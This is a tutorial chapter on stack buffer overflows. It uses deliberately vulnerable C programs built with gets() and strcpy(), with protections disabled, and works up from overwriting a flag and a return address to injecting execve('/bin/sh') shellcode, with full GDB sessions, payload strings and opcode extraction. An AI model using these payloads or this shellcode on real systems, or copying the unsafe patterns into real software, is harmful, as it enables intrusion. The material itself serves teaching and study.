Interacting with memory is part of every non-trivial program. To process data reliably, a program must manage the sizes of its data buffers correctly. Writing more data than a buffer can hold results in a so-called buffer overflow: the memory region directly following the buffer is overwritten. This chapter explains this behavior and its effects in a detailed and practical way.
Modern compilers and operating systems include protection mechanisms that mitigate the effects of buffer overflows. For the sake of simplicity, these mechanisms are ignored for now and explained in later chapters. The first line of each code example contains the compilation command that disables optimizations and protection mechanisms. All examples but the first one require ASLR to be disabled. The following command disables ASLR until it is enabled again or the machine is rebooted.
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable ASLR again, use the command below.
$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
As disabling ASLR and running binaries without compiler protection mechanisms poses a security risk, it is recommended to apply this change and execute the vulnerable applications only in a virtual machine or another protected environment.
With this concept in mind, we turn to a first practical example.
The code below asks the user for their name and prints whether they are an administrator. A user is classified as an administrator if the entered name is "admin".
// gcc -g -O0 -m32 -std=c99 control.c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

struct User
{
    char name[8];
    bool is_admin;
};

int main()
{
    struct User user = {0};

    printf("Enter user name:\n");
    gets(user.name);
    if(strcmp(user.name, "admin") == 0)
        user.is_admin = true;

    if(user.is_admin)
        printf("Welcome back administrator!\n");
    else
        printf("Meh, hello %s. I was hoping for the administrator.\n", user.name);

    return 0;
}
Executing the code results in the output shown below.
$ ./a.out
Enter user name:
nufan
Meh, hello nufan. I was hoping for the administrator.
Assuming basic knowledge of the C programming language, this behavior should come as no surprise. While the code is short and straightforward, it still contains a significant security vulnerability. user.name is a character array with a fixed size of 8 bytes, but the gets() function does not limit the length of the input. Next, we intentionally exceed the available input capacity.
$ ./a.out
Enter user name:
123456789
Welcome back administrator!
According to the output, we are classified as an administrator although an incorrect name was entered. To retrace this behavior, we will look at the memory content after the initialization and after each of the two inputs above. GDB is used to inspect the memory of the user variable. Additionally, the relevant memory region is visualized to ease understanding.
First, the state of the user variable is inspected directly after initialization. A breakpoint is set at line 16 to stop execution and print the user variable.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 16
Breakpoint 1 at 0x647: file control.c, line 16.
(gdb) run
Starting program: /home/memory-corruption/a.out

Breakpoint 1, main () at control.c:16
16      printf("Enter user name:\n");
(gdb) p user
$1 = {name = "\000\000\000\000\000\000\000", is_admin = false}
Below you can see a memory-oriented visualization of the GDB output.
Just like before, we first enter the short name "nufan" and look at the resulting application state. To inspect the variable before the application exits, we set a breakpoint at the return statement in line 26.
(gdb) break 26
Breakpoint 2 at 0x565556b8: file control.c, line 26.
(gdb) continue
Continuing.
Enter user name:
nufan
Meh, hello nufan. I was hoping for the administrator.

Breakpoint 2, main () at control.c:26
26      return 0;
(gdb) p user
$2 = {name = "nufan\000\000", is_admin = false}
As expected, the memory content looks reasonable. The second case is much more interesting: using "123456789" as the name exceeds the space of user.name and results in the following state.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 26
Breakpoint 1 at 0x6b8: file control.c, line 26.
(gdb) run
Starting program: /home/memory-corruption/a.out
Enter user name:
123456789
Welcome back administrator!

Breakpoint 1, main () at control.c:26
26      return 0;
(gdb) p user
$1 = {name = "12345678", is_admin = 57}
The user.name buffer was filled completely. Because even more data was entered, the '9' character (ASCII value 57) spilled over into the adjacent variable user.is_admin. Remember that in the C programming language every value other than 0 is considered true. Thus, the application classifies the user as an administrator.
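The spill-over can be reproduced without undefined behavior by modelling the struct as a plain byte array. The following is a minimal sketch, not part of control.c: the helper name `is_admin_byte_after` and the 256-byte scratch array are assumptions made for illustration, and the struct is assumed to be laid out without padding between `name` and `is_admin`, as the GDB output suggests.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Same layout as the struct in control.c. */
struct User
{
    char name[8];
    bool is_admin;
};

/*
 * Models what gets() does to the struct, but inside a scratch array that is
 * large enough, so the sketch itself never writes out of bounds.
 * Returns the byte that ends up at the offset where is_admin lives.
 */
unsigned char is_admin_byte_after(const char *input)
{
    unsigned char memory[256] = {0};
    size_t len = strlen(input);

    if(len >= sizeof(memory))
        len = sizeof(memory) - 1;

    memcpy(memory, input, len); /* the input bytes ...                   */
    memory[len] = '\0';         /* ... plus the terminator gets() writes */

    return memory[offsetof(struct User, is_admin)];
}
```

Calling the helper with "nufan" yields 0, while "123456789" yields 57, the ASCII value of '9'. An input of exactly 8 characters also yields 0, because only the terminating \0 lands in is_admin.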
Simply by overflowing an input buffer, the control flow of the application was redirected to a different execution branch. Although this example seems harmless because the two branches differ only in a static output, the same kind of vulnerability could equally allow an attacker to take full control of the application.
While the previous example already made use of a buffer overflow, it is limited to selecting a predefined control flow branch. The next example takes the exploitation one step further.
The example code copies the first command line argument to a variable located on the stack.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 function.c
#include <stdio.h>
#include <string.h>

void admin_stuff()
{
    printf("Welcome back administrator!\n");
}

int main(int argc, char *argv[])
{
    char buffer[8] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Copying \"%s\"\n", argv[1]);
    strcpy(buffer, argv[1]);

    return 0;
}
Clearly, strcpy() copies an input of variable size into a buffer of fixed size. Note that the code contains a function admin_stuff() which is not part of the regular control flow. In contrast to the previous example, however, no control variable is located on the stack. This time we will not try to switch to a predefined execution branch; instead, we want to call admin_stuff(), an existing function within the binary that is never called during regular execution. Building on the background about program execution and function calls from the previous chapter, we extend the view of the memory to include the stack frame.
The behavior of the application under normal circumstances is observed in GDB. Directly after the initialization of the buffer, the top of the stack looks as follows.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) set backtrace past-main
(gdb) break 14
Breakpoint 1 at 0x804848d: file function.c, line 14.
(gdb) break 23
Breakpoint 2 at 0x80484d2: file function.c, line 23.
(gdb) run ABCD
Starting program: /home/memory-corruption/a.out ABCD

Breakpoint 1, main (argc=2, argv=0xffffd444) at function.c:14
14      if(argc != 2)
(gdb) x/4wx $esp
0xffffd3a0:     0x00000000      0x00000000      0x00000000      0xf7e11286
We can identify the 8 bytes of the buffer variable, the 4 bytes of the saved EBP register and the 4-byte return address. Just before execution finishes, the second breakpoint is hit.
(gdb) continue
Continuing.
Copying "ABCD"

Breakpoint 2, main (argc=2, argv=0xffffd444) at function.c:23
23      return 0;
(gdb) x/4wx $esp
0xffffd3a0:     0x44434241      0x00000000      0x00000000      0xf7e11286
Now the buffer is partially filled with the entered data. Observe the little-endian byte order of the values.
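To make the byte order concrete, the following minimal sketch shows how four consecutive bytes in memory turn into the 32-bit word that `x/4wx` prints on a little-endian machine. The function name `read_le32` is an assumption for illustration and does not appear in the example program.

```c
#include <stdint.h>

/*
 * Combines four consecutive bytes into one 32-bit word, least significant
 * byte first, which is how a little-endian CPU interprets them.
 */
uint32_t read_le32(const unsigned char *bytes)
{
    return (uint32_t)bytes[0]
         | ((uint32_t)bytes[1] << 8)
         | ((uint32_t)bytes[2] << 16)
         | ((uint32_t)bytes[3] << 24);
}
```

For the bytes 'A', 'B', 'C', 'D' (0x41 to 0x44) the function returns 0x44434241, matching the first word of the GDB output: the first byte in memory ends up as the lowest byte of the printed word.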
The goal of this exercise is to overwrite the return address 0xf7e11286 on the stack. Instead of returning to the previous function on the call stack, the control flow should be redirected to the admin_stuff() function. With ASLR and PIE disabled, the function has a static address within the binary and at runtime. nm is used to resolve the address of the symbol.
$ nm a.out | grep admin_stuff
08048466 T admin_stuff
This output shows that the admin_stuff() symbol is located at address 0x08048466 in the text segment.
In order to overwrite the return address, the 8-byte buffer and the 4-byte copy of EBP need to be overwritten first. "ABCDEFGHIJKL" is chosen to fill up this region. The payload ends with the address of admin_stuff() (0x08048466) in little-endian format.
$ gdb -q a.out
Reading symbols from a.out...done.
(gdb) break 23
Breakpoint 1 at 0x80484d2: file function.c, line 23.
(gdb) run $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08")
Starting program: /home/memory-corruption/a.out $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08")
Copying "ABCDEFGHIJKLf[?]"

Breakpoint 1, main (argc=0, argv=0xffffd434) at function.c:23
23      return 0;
(gdb) x/4wx $esp
0xffffd390:     0x44434241      0x48474645      0x4c4b4a49      0x08048466
(gdb) continue
Continuing.
Welcome back administrator!

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
As the output shows, the admin_stuff() function is indeed executed. Due to the corrupted stack layout, the program crashes with a segmentation fault directly after the function returns. Remember that strcpy() also writes a \0 byte to terminate the destination string, which was neglected in the illustrations. Of course, the exploit also works outside GDB and with arbitrary non-zero fill values for the memory region before the return address.
$ ./a.out $(echo -en "000000000000\x66\x84\x04\x08")
Copying "000000000000f[?]"
Welcome back administrator!
Segmentation fault
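The payload passed on the command line can also be assembled programmatically. The sketch below is one possible way to do this, under the assumption that the target is a 32-bit little-endian binary; the function name `build_payload` and its parameters are hypothetical and not part of function.c.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Writes `filler` followed by `target` in little-endian byte order into `out`.
 * Returns the number of bytes written, or 0 if `out` is too small.
 * The result is not \0-terminated; it is raw payload data.
 */
size_t build_payload(unsigned char *out, size_t out_size,
                     const char *filler, uint32_t target)
{
    size_t filler_len = strlen(filler);

    if(out_size < filler_len + 4)
        return 0;

    memcpy(out, filler, filler_len);

    /* Least significant byte first: 0x08048466 becomes 66 84 04 08. */
    for(size_t i = 0; i < 4; i++)
        out[filler_len + i] = (unsigned char)(target >> (8 * i));

    return filler_len + 4;
}
```

With the filler "ABCDEFGHIJKL" and the target 0x08048466, the function produces the same 16 bytes as the `echo -en` command used in the GDB session. Because strcpy() stops at the first \0, neither the filler nor the address may contain a zero byte.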
The vulnerable program of this section is functionally identical to the previous example, but it has a larger buffer and does not contain any predefined function we might want to call. Additionally, the address of the buffer is printed upon execution.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 -z execstack execve.c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[32] = {0};

    if(argc != 2)
    {
        printf("A single argument is required.\n");
        return 1;
    }

    printf("Buffer: %p\n", buffer);
    strcpy(buffer, argv[1]);

    return 0;
}
The first step is to redirect execution to the buffer. This is accomplished by filling up the 32 bytes of buffer plus the 4 bytes of the saved EBP and overwriting the return address with the address of the buffer. We will first try this in GDB. It is important to note that addresses differ slightly when the application is executed within the debugger. Also note that command line arguments and environment variables are located on the stack and thus influence the address of the buffer array. Execute the application with arbitrary parameters of the intended length to find out the address of the buffer. In the following example, the buffer is assumed to be located at 0xffffd358.
$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048466 <+0>:     push   ebp
   [...]
   0x080484d1 <+107>:   ret
End of assembler dump.
(gdb) break *0x080484d1
Breakpoint 1 at 0x080484d1: file execve.c, line 19.
(gdb) run $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff")
Starting program: /home/memory-corruption/a.out $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff")
Buffer: 0xffffd358

Breakpoint 1, 0x080484d1 in main (argc=0, argv=0xffffd414) at execve.c:19
20      }
(gdb) ni
0xffffd358 in ?? ()
As the last line of the output indicates, the execution was successfully redirected to the buffer. However, when inspecting the instructions at this location, no meaningful code can be identified:
(gdb) x/s $eip
0xffffd358:     "12345678901234567890123456789012AAAAX\323\377\377"
(gdb) x/5i $eip
=> 0xffffd358:  xor    DWORD PTR [edx],esi
   0xffffd35a:  xor    esi,DWORD PTR [esi*1+0x39383736]
   0xffffd361:  xor    BYTE PTR [ecx],dh
   0xffffd363:  xor    dh,BYTE PTR [ebx]
   0xffffd365:  xor    al,0x35
(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xffffd35a in ?? ()
The program crashes because of invalid memory accesses. This is understandable, as we only wanted to fill up the memory and did not yet care about mapping its content to instructions. What we need at this point is executable code in compiled form. Generating this code with a high-level programming language would most likely introduce unintended instructions, so we fall back to assembly. More specifically, we will use NASM to create our so-called shellcode.
Our final goal is to execute the shell /bin/sh via the execve system call. Calling execve has the following requirements when the interrupt is triggered:
- EAX contains an identifier for the system call and needs to have the value 11 (0x0b) for execve.
- EBX points to the (\0-terminated) name of the executable to be executed ("/bin/sh" in our case).
- ECX points to argv, that is, an array that contains at least a pointer to the executable name (as referenced by EBX) and is terminated with a NULL pointer.
- EDX points to envp. As we do not need environment variables for the execution, we can simply set it to NULL.
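For orientation, the register contents listed above correspond to the arguments of the execve() library wrapper in C. The following sketch shows that mapping; the struct `ExecveArgs` and the two function names are assumptions made for illustration. Passing NULL as envp is accepted on Linux but is not guaranteed to be portable to other systems.

```c
#include <stddef.h>
#include <unistd.h>

/* Argument set for execve(); each field corresponds to one register. */
struct ExecveArgs
{
    const char *path; /* EBX: name of the executable             */
    char *argv[2];    /* ECX: points to this NULL-terminated array */
    char **envp;      /* EDX: NULL, no environment is passed     */
};

/* Fills in the values the shellcode has to produce by hand. */
void prepare_shell_args(struct ExecveArgs *args)
{
    static char shell[] = "/bin/sh";

    args->path = shell;
    args->argv[0] = shell; /* argv[0] is the executable name   */
    args->argv[1] = NULL;  /* NULL pointer terminates the array */
    args->envp = NULL;
}

/* Only returns if the call fails; on success the process image is replaced. */
int spawn_shell(void)
{
    struct ExecveArgs args;

    prepare_shell_args(&args);
    return execve(args.path, args.argv, args.envp);
}
```

The system call number (EAX) does not show up here because the C library wrapper sets it internally. The shellcode cannot rely on the wrapper and therefore has to set up all four registers itself.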
First we need to correct the stack pointer. When returning from the main function, the stack frame is destroyed by increasing ESP. Our buffer is still there, but ESP was moved to a higher memory address. As we want to push some values, we need to make sure that ESP points to a memory address lower than our buffer so that we do not overwrite our own code. Subtracting 0x30 (48) is a good guess, as we want to skip the return address (4 bytes), the saved EBP (4 bytes), buffer (32 bytes) and possibly some stack-alignment padding introduced by the compiler.
sub esp,0x30
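The arithmetic behind this adjustment can be written down as a small sketch. It assumes that the saved EBP sits directly above the 32-byte buffer, without compiler padding in between, which matches the 36 filler bytes used earlier. The constant and function names are hypothetical.

```c
#include <stdint.h>

enum
{
    BUFFER_SIZE    = 32, /* char buffer[32]                 */
    SAVED_EBP_SIZE = 4,  /* pushed by the function prologue */
    RET_ADDR_SIZE  = 4   /* popped by ret                   */
};

/* ESP right after main's ret has popped the (overwritten) return address. */
uint32_t esp_after_ret(uint32_t buffer_addr)
{
    return buffer_addr + BUFFER_SIZE + SAVED_EBP_SIZE + RET_ADDR_SIZE;
}

/* ESP after the first shellcode instruction, sub esp,0x30. */
uint32_t esp_after_adjust(uint32_t buffer_addr)
{
    return esp_after_ret(buffer_addr) - 0x30;
}
```

For a buffer at 0xffffd358, ESP is 0xffffd380 after the return and 0xffffd350 after the subtraction. This is 8 bytes below the start of the buffer, so the following push instructions cannot overwrite the shellcode.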
Next, we need the \0-terminated string "/bin/sh" on the stack. As the stack grows from bottom (high memory addresses) to top (low memory addresses), we need to push the string in reverse. Thus we start with the termination character \0. Keep in mind that we are using strcpy() to copy the data. It stops copying at a \0 character in the source string, so the compiled code must not contain any 0 bytes. Luckily, there are several ways to calculate 0 without explicitly mentioning it. One common way is to xor a value with itself, which always results in 0 regardless of the value used.
xor eax,eax
We do not have to care about the size of this termination value, so we push the full 4-byte register to the stack:
push eax
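The reason for avoiding a literal 0 becomes visible when comparing the machine code of two ways to clear EAX. The sketch below counts how many bytes of an instruction sequence strcpy() would copy before it stops. The helper name `bytes_surviving_strcpy` and the array names are assumptions for illustration; the encoding of `xor eax,eax` is taken from the objdump listing of the final shellcode, and `b8 00 00 00 00` is the standard encoding of `mov eax,0x0`.

```c
#include <stddef.h>

/*
 * Number of leading bytes of `code` that strcpy() would copy
 * before it encounters a 0 byte and stops.
 */
size_t bytes_surviving_strcpy(const unsigned char *code, size_t len)
{
    size_t i = 0;

    while(i < len && code[i] != 0x00)
        i++;

    return i;
}

/* mov eax,0x0  ->  b8 00 00 00 00 (contains four 0 bytes) */
const unsigned char mov_eax_zero[] = { 0xb8, 0x00, 0x00, 0x00, 0x00 };

/* xor eax,eax  ->  31 c0 (no 0 byte at all) */
const unsigned char xor_eax_eax[] = { 0x31, 0xc0 };
```

Only 1 of the 5 bytes of `mov eax,0x0` would reach the buffer, so the shellcode would be cut off in the middle of the instruction. Both bytes of `xor eax,eax` survive the copy.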
The remaining string is 7 characters long. To push it as two words of 4 bytes each, we need to add a fill character. "//bin/sh" is an equivalent alternative to "/bin/sh" that is 8 characters long.
push 0x68732f6e ; hs/n
push 0x69622f2f ; ib//
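That these pushes really leave a readable string at the top of the stack can be checked with a toy model of the stack. The sketch below is a simulation under simplifying assumptions: the stack is a small byte array, ESP is an index into it, and all names (`ToyStack`, `toy_push32`, `toy_push_shell_path`) are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define STACK_SIZE 32

/* Toy model: `esp` is an index into `mem`; the stack grows toward index 0. */
struct ToyStack
{
    unsigned char mem[STACK_SIZE];
    size_t esp;
};

void toy_stack_init(struct ToyStack *s)
{
    memset(s->mem, 0xAA, sizeof(s->mem)); /* recognizable junk */
    s->esp = STACK_SIZE;                  /* empty stack       */
}

/* Models a 32-bit push: move ESP down by 4, then store little-endian. */
int toy_push32(struct ToyStack *s, uint32_t value)
{
    if(s->esp < 4)
        return -1; /* toy stack exhausted */

    s->esp -= 4;
    for(size_t i = 0; i < 4; i++)
        s->mem[s->esp + i] = (unsigned char)(value >> (8 * i));

    return 0;
}

/* Runs the three pushes from the text and returns what ESP points to. */
const char *toy_push_shell_path(struct ToyStack *s)
{
    toy_stack_init(s);
    toy_push32(s, 0x00000000u); /* push eax (EAX is 0) */
    toy_push32(s, 0x68732f6eu); /* push 0x68732f6e     */
    toy_push32(s, 0x69622f2fu); /* push 0x69622f2f     */

    return (const char *)&s->mem[s->esp];
}
```

The returned pointer refers to the \0-terminated string "//bin/sh". The word pushed last lies at the lowest address and therefore forms the beginning of the string, which is why the string has to be pushed back to front.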
Now that the string is set up correctly, the registers need to be filled accordingly. EBX needs to point to the name of the binary to execute. "//bin/sh" was pushed to the stack with the previous commands. Hence, ESP is a pointer to this string and can be copied to EBX.
mov ebx,esp
Successful execution requires argv to be set correctly. This convention is also visible in C programs: argv is an array of pointers to strings (char *argv[]) that is terminated by a NULL value. argv[0] contains the executable name.
push eax ; argv[1] = NULL
push ebx ; argv[0] = "//bin/sh"
ECX needs to point to this array of pointers.
mov ecx,esp
Because no environment variables are needed, envp, which is passed via EDX, is set to NULL.
mov edx,eax
Lastly, the system call number is set to 11 (0x0b) and the interrupt is triggered.
mov al,0xb
int 0x80
We are done! Here is the full code:
; nasm -f elf32 execve.s
sub esp,0x30
xor eax,eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov edx,eax
mov al,0xb
int 0x80
After translation with the nasm assembler, objdump is used to extract the executable code from the assembled object file.
$ objdump -d -M intel-mnemonic execve.o

execve.o:     file format elf32-i386


Disassembly of section .text:

00000000 <.text>:
   0:   83 ec 30                sub    esp,0x30
   3:   31 c0                   xor    eax,eax
   5:   50                      push   eax
   6:   68 6e 2f 73 68          push   0x68732f6e
   b:   68 2f 2f 62 69          push   0x69622f2f
  10:   89 e3                   mov    ebx,esp
  12:   50                      push   eax
  13:   53                      push   ebx
  14:   89 e1                   mov    ecx,esp
  16:   89 c2                   mov    edx,eax
  18:   b0 0b                   mov    al,0xb
  1a:   cd 80                   int    0x80
A little bash magic helps to extract the opcodes and bring them into a usable form.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -En \\x$i; done
\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
Count the number of bytes used for the payload to calculate the required padding.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -en \\x$i; done | wc -c
28
To fill up 36 bytes (32-byte buffer + 4-byte saved EBP), a padding of 8 bytes is required. "12345678" was chosen in this case.
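The padding calculation can be expressed as a small sketch. The `shellcode` array contains the 28 bytes extracted with objdump; the function name `padding_needed` and its parameters are assumptions for illustration.

```c
#include <stddef.h>

/* The 28 shellcode bytes as extracted from execve.o. */
const unsigned char shellcode[] = {
    0x83, 0xec, 0x30,             /* sub  esp,0x30   */
    0x31, 0xc0,                   /* xor  eax,eax    */
    0x50,                         /* push eax        */
    0x68, 0x6e, 0x2f, 0x73, 0x68, /* push 0x68732f6e */
    0x68, 0x2f, 0x2f, 0x62, 0x69, /* push 0x69622f2f */
    0x89, 0xe3,                   /* mov  ebx,esp    */
    0x50,                         /* push eax        */
    0x53,                         /* push ebx        */
    0x89, 0xe1,                   /* mov  ecx,esp    */
    0x89, 0xc2,                   /* mov  edx,eax    */
    0xb0, 0x0b,                   /* mov  al,0xb     */
    0xcd, 0x80                    /* int  0x80       */
};

/*
 * Bytes needed between the end of the code and the return address.
 * Returns 0 if the code already fills or exceeds the region.
 */
size_t padding_needed(size_t code_len, size_t buffer_size, size_t saved_ebp_size)
{
    size_t region = buffer_size + saved_ebp_size;

    return code_len <= region ? region - code_len : 0;
}
```

For the values of this example, `padding_needed(sizeof(shellcode), 32, 4)` evaluates to 8. The complete payload is therefore 28 + 8 + 4 = 40 bytes long, with the last 4 bytes holding the address of the buffer.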
Feeding this exploit into the application executes a shell.
$ ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff")
Buffer: 0xffffd3b8
$
The overall memory state correlated with the assembly code is shown in the visualization below.
Finally we managed to execute arbitrary code by exploiting a buffer overflow vulnerability!